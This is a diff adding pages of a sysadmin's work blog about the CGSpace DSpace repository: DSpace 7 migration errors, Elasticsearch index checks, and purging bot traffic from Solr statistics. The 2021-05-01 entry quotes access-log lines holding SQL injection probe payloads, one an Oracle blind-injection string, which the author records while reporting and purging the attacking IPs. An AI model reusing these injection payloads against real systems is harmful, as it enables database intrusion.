+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --limit <span style="color:#ae81ff">1000</span> --type<span style="color:#f92672">=</span>data
+</span></span></code></pre></div><ul>
+<li>Then I started a fresh AReS harvest</li>
+</ul>
+<h2 id="2021-04-26">2021-04-26</h2>
+<ul>
+<li>The AReS harvest last night seems to have finished successfully and the number of items looks good:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
+</span></span></code></pre></div><ul>
+<li>And the aliases seem correct for once:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><ul>
+<li>That&rsquo;s 250 new items in the index since the last harvest!</li>
+<li>Re-create my local Artifactory container because I&rsquo;m getting errors starting it and it has been a few months since it was updated:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman rm artifactory
+</span></span><span style="display:flex;"><span>$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
+</span></span><span style="display:flex;"><span>$ podman create --ulimit nofile<span style="color:#f92672">=</span>32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
+</span></span><span style="display:flex;"><span>$ podman start artifactory
+</span></span></code></pre></div><ul>
+<li>Start testing DSpace 7.0 Beta 5 so I can evaluate if it solves some of the problems we are having on DSpace 6, and if it&rsquo;s missing things like multiple handle resolvers, etc
+<ul>
+<li>I see it needs Java JDK 11, Tomcat 9, Solr 8, and PostgreSQL 11</li>
+<li>Also, according to the <a href="https://wiki.lyrasis.org/display/DSDOC7x/Installing+DSpace">installation notes</a> I see you can install the old DSpace 6 REST API, so that&rsquo;s potentially useful for us</li>
+<li>I see that all web applications on the backend are now rolled into just one &ldquo;server&rdquo; application</li>
+<li>The build process took 11 minutes the first time (due to downloading the world with Maven) and ~2 minutes the second time</li>
+<li>The <code>local.cfg</code> content and syntax is very similar DSpace 6</li>
+</ul>
+</li>
+<li>I got the basic <code>fresh_install</code> up and running
+<ul>
+<li>Then I tried to import a DSpace 6 database from production</li>
+</ul>
+</li>
+<li>I tried to delete all the Atmire SQL migrations:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7b5= &gt; DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;
+</span></span></code></pre></div><ul>
+<li>But I got an error when running <code>dspace database migrate</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ~/dspace7b5/bin/dspace database migrate
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Database URL: jdbc:postgresql://localhost:5432/dspace7b5
+</span></span><span style="display:flex;"><span>Migrating database to latest version... (Check dspace logs for details)
+</span></span><span style="display:flex;"><span>Migration exception:
+</span></span><span style="display:flex;"><span>java.sql.SQLException: Flyway migration error occurred
+</span></span><span style="display:flex;"><span>        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
+</span></span><span style="display:flex;"><span>        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
+</span></span><span style="display:flex;"><span>        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
+</span></span><span style="display:flex;"><span>        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
+</span></span><span style="display:flex;"><span>Caused by: org.flywaydb.core.api.FlywayException: Validate failed: 
+</span></span><span style="display:flex;"><span>Detected applied migration not resolved locally: 5.0.2017.09.25
+</span></span><span style="display:flex;"><span>Detected applied migration not resolved locally: 6.0.2017.01.30
+</span></span><span style="display:flex;"><span>Detected applied migration not resolved locally: 6.0.2017.09.25
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>        at org.flywaydb.core.Flyway.doValidate(Flyway.java:292)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.Flyway.access$100(Flyway.java:73)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.Flyway$1.execute(Flyway.java:166)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.Flyway$1.execute(Flyway.java:158)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.Flyway.execute(Flyway.java:527)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.Flyway.migrate(Flyway.java:158)
+</span></span><span style="display:flex;"><span>        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:729)
+</span></span><span style="display:flex;"><span>        ... 9 more
+</span></span></code></pre></div><ul>
+<li>I deleted those migrations:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7b5= &gt; DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);
+</span></span></code></pre></div><ul>
+<li>Then when I ran the migration again it failed for a new reason, related to the configurable workflow:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Database URL: jdbc:postgresql://localhost:5432/dspace7b5
+</span></span><span style="display:flex;"><span>Migrating database to latest version... (Check dspace logs for details)
+</span></span><span style="display:flex;"><span>Migration exception:
+</span></span><span style="display:flex;"><span>java.sql.SQLException: Flyway migration error occurred
+</span></span><span style="display:flex;"><span>        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
+</span></span><span style="display:flex;"><span>        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
+</span></span><span style="display:flex;"><span>        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
+</span></span><span style="display:flex;"><span>        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
+</span></span><span style="display:flex;"><span>Caused by: org.flywaydb.core.internal.command.DbMigrate$FlywayMigrateException:
+</span></span><span style="display:flex;"><span>Migration V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql failed
+</span></span><span style="display:flex;"><span>--------------------------------------------------------------------
+</span></span><span style="display:flex;"><span>SQL State  : 42P01
+</span></span><span style="display:flex;"><span>Error Code : 0
+</span></span><span style="display:flex;"><span>Message    : ERROR: relation &#34;cwf_pooltask&#34; does not exist
+</span></span><span style="display:flex;"><span>  Position: 8
+</span></span><span style="display:flex;"><span>Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql (/home/aorth/src/apache-tomcat-9.0.45/file:/home/aorth/dspace7b5/lib/dspace-api-7.0-beta5.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql)
+</span></span><span style="display:flex;"><span>Line       : 16
+</span></span><span style="display:flex;"><span>Statement  : UPDATE cwf_pooltask SET workflow_id=&#39;defaultWorkflow&#39; WHERE workflow_id=&#39;default&#39;
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><ul>
+<li>The <a href="https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace">DSpace 7 upgrade docs</a> say I need to apply these previously optional migrations:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ~/dspace7b5/bin/dspace database migrate ignored
+</span></span></code></pre></div><ul>
+<li>Now I see all migrations have completed and DSpace actually starts up fine!</li>
+<li>I will try to do a full re-index to see how long it takes:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time ~/dspace7b5/bin/dspace index-discovery -b
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>~/dspace7b5/bin/dspace index-discovery -b  25156.71s user 64.22s system 97% cpu 7:11:09.94 total
+</span></span></code></pre></div><ul>
+<li>Not good, that shit took almost seven hours!</li>
+</ul>
+<h2 id="2021-04-27">2021-04-27</h2>
+<ul>
+<li>Peter sent me a list of 500+ DOIs from CGSpace with no Altmetric score
+<ul>
+<li>I used csvgrep (with Windows encoding!) to extract those without our handle and save the DOIs to a text file, then got their handles with my <code>doi-to-handle.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -e <span style="color:#e6db74">&#39;windows-1252&#39;</span> -c <span style="color:#e6db74">&#39;Handle.net IDs&#39;</span> -i -m <span style="color:#e6db74">&#39;10568/&#39;</span> ~/Downloads/Altmetric<span style="color:#ae81ff">\ </span>-<span style="color:#ae81ff">\ </span>Research<span style="color:#ae81ff">\ </span>Outputs<span style="color:#ae81ff">\ </span>-<span style="color:#ae81ff">\ </span>CGSpace<span style="color:#ae81ff">\ </span>-<span style="color:#ae81ff">\ </span>2021-04-26.csv | csvcut -c DOI | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/dois.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.csv -db dspace63 -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
+</span></span></code></pre></div><ul>
+<li>He will Tweet them&hellip;</li>
+</ul>
+<h2 id="2021-04-28">2021-04-28</h2>
+<ul>
+<li>Grant some IWMI colleagues access to the Atmire Content and Usage stats on CGSpace</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-05/index.html b/docs/2021-05/index.html
new file mode 100644
index 000000000..c44e7ae98
--- /dev/null
+++ b/docs/2021-05/index.html
@@ -0,0 +1,739 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2021" />
+<meta property="og:description" content="2021-05-01
+
+I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+
+&ldquo;RI/1.0&rdquo;, 1337
+&ldquo;Microsoft Office Word 2014&rdquo;, 941
+
+
+I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-05/" />
+<meta property="article:published_time" content="2021-05-02T09:50:54+03:00" />
+<meta property="article:modified_time" content="2021-07-06T17:03:55+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2021"/>
+<meta name="twitter:description" content="2021-05-01
+
+I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+
+&ldquo;RI/1.0&rdquo;, 1337
+&ldquo;Microsoft Office Word 2014&rdquo;, 941
+
+
+I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-05/",
+  "wordCount": "3605",
+  "datePublished": "2021-05-02T09:50:54+03:00",
+  "dateModified": "2021-07-06T17:03:55+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-05/">
+
+    <title>May, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-05/">May, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-05-02T09:50:54+03:00">Sun May 02, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-05-01">2021-05-01</h2>
+<ul>
+<li>I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+<ul>
+<li>&ldquo;RI/1.0&rdquo;, 1337</li>
+<li>&ldquo;Microsoft Office Word 2014&rdquo;, 941</li>
+</ul>
+</li>
+<li>I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;</li>
+</ul>
+<ul>
+<li>I should probably add the <code>RI/1.0</code> pattern to COUNTER-Robots project</li>
+<li>As well as these IPs:
+<ul>
+<li>193.169.254.178, 21648</li>
+<li>181.62.166.177, 20323</li>
+<li>45.146.166.180, 19376</li>
+</ul>
+</li>
+<li>The first IP seems to be in Estonia and their requests to the REST API change user agents from curl to Mac OS X to Windows and more
+<ul>
+<li>Also, they seem to be trying to exploit something:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
+</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata-21%2B21*01 HTTP/1.1&#34; 200 458201 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
+</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;||lower(&#39;&#39;)||&#39; HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
+</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;%2Brtrim(&#39;&#39;)%2B&#39; HTTP/1.1&#34; 200 458209 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
+</span></span></code></pre></div><ul>
+<li>I will report the IP on abuseipdb.com and purge their hits from Solr</li>
+<li>The second IP is in Colombia and is making thousands of requests for what looks like some test site:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
+</span></span><span style="display:flex;"><span>181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
+</span></span></code></pre></div><ul>
+<li>But this site does not exist (yet?)
+<ul>
+<li>I will purge them from Solr</li>
+</ul>
+</li>
+<li>The third IP is in Russia apparently, and the user agent has the <code>pl-PL</code> locale with thousands of requests like this:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] &#34;GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&amp;isAllowed=y HTTP/1.1&#34; 200 918998 &#34;http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf&#34; &#34;Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15&#34;
+</span></span></code></pre></div><ul>
+<li>I will purge these all with my <code>check-spider-ip-hits.sh</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+</span></span><span style="display:flex;"><span>Purging 21648 hits from 193.169.254.178 in statistics
+</span></span><span style="display:flex;"><span>Purging 20323 hits from 181.62.166.177 in statistics
+</span></span><span style="display:flex;"><span>Purging 19376 hits from 45.146.166.180 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 61347
+</span></span></code></pre></div><h2 id="2021-05-02">2021-05-02</h2>
+<ul>
+<li>Check the AReS Harvester indexes:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span></code></pre></div><ul>
+<li>I think they look OK (<code>openrxv-items</code> is an alias of <code>openrxv-items-final</code>), but I took a backup just in case:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
+</span></span></code></pre></div><ul>
+<li>Then I started an indexing in the AReS Explorer admin dashboard</li>
+<li>The indexing finished, but it looks like the aliases are messed up again:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
+</span></span></code></pre></div><h2 id="2021-05-05">2021-05-05</h2>
+<ul>
+<li>Peter noticed that we no longer display <code>cg.link.reference</code> on the item view
+<ul>
+<li>It seems that this got dropped accidentally when we migrated to <code>dcterms.relation</code> in CG Core v2</li>
+<li>I fixed it in the <code>6_x-prod</code> branch and told him it will be live soon</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-05-09">2021-05-09</h2>
+<ul>
+<li>I set up a clean DSpace 6.4 instance locally to test some things against, for example to be able to rule out whether some issues are due to Atmire modules or are fixed in the as-of-yet-unreleased DSpace 6.4
+<ul>
+<li>I had to delete all the Atmire schemas, then it worked fine on Tomcat 8.5 with Mirage (I didn&rsquo;t want to bother with npm and ruby for Mirage 2)</li>
+<li>Then I tried to see if I could reproduce the mapping issue that Marianne raised last month
+<ul>
+<li>I tried unmapping and remapping to the CGIAR Gender grants collection and the collection appears in the item view&rsquo;s list of mapped collections, but not on the collection browse itself</li>
+<li>Then I tried mapping to a new collection and it was the same as above</li>
+<li>So this issue is really just a DSpace bug, and nothing to do with Atmire and not fixed in the unreleased DSpace 6.4</li>
+<li>I will try one more time after updating the Discovery index (I&rsquo;m also curious how fast it is on vanilla DSpace 6.4, though I think I tried that when I did the flame graphs in 2019 and it was miserable)</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time ~/dspace64/bin/dspace index-discovery -b
+</span></span><span style="display:flex;"><span>~/dspace64/bin/dspace index-discovery -b  4053.24s user 53.17s system 38% cpu 2:58:53.83 total
+</span></span></code></pre></div><ul>
+<li>Nope! Still slow, and still no mapped item&hellip;
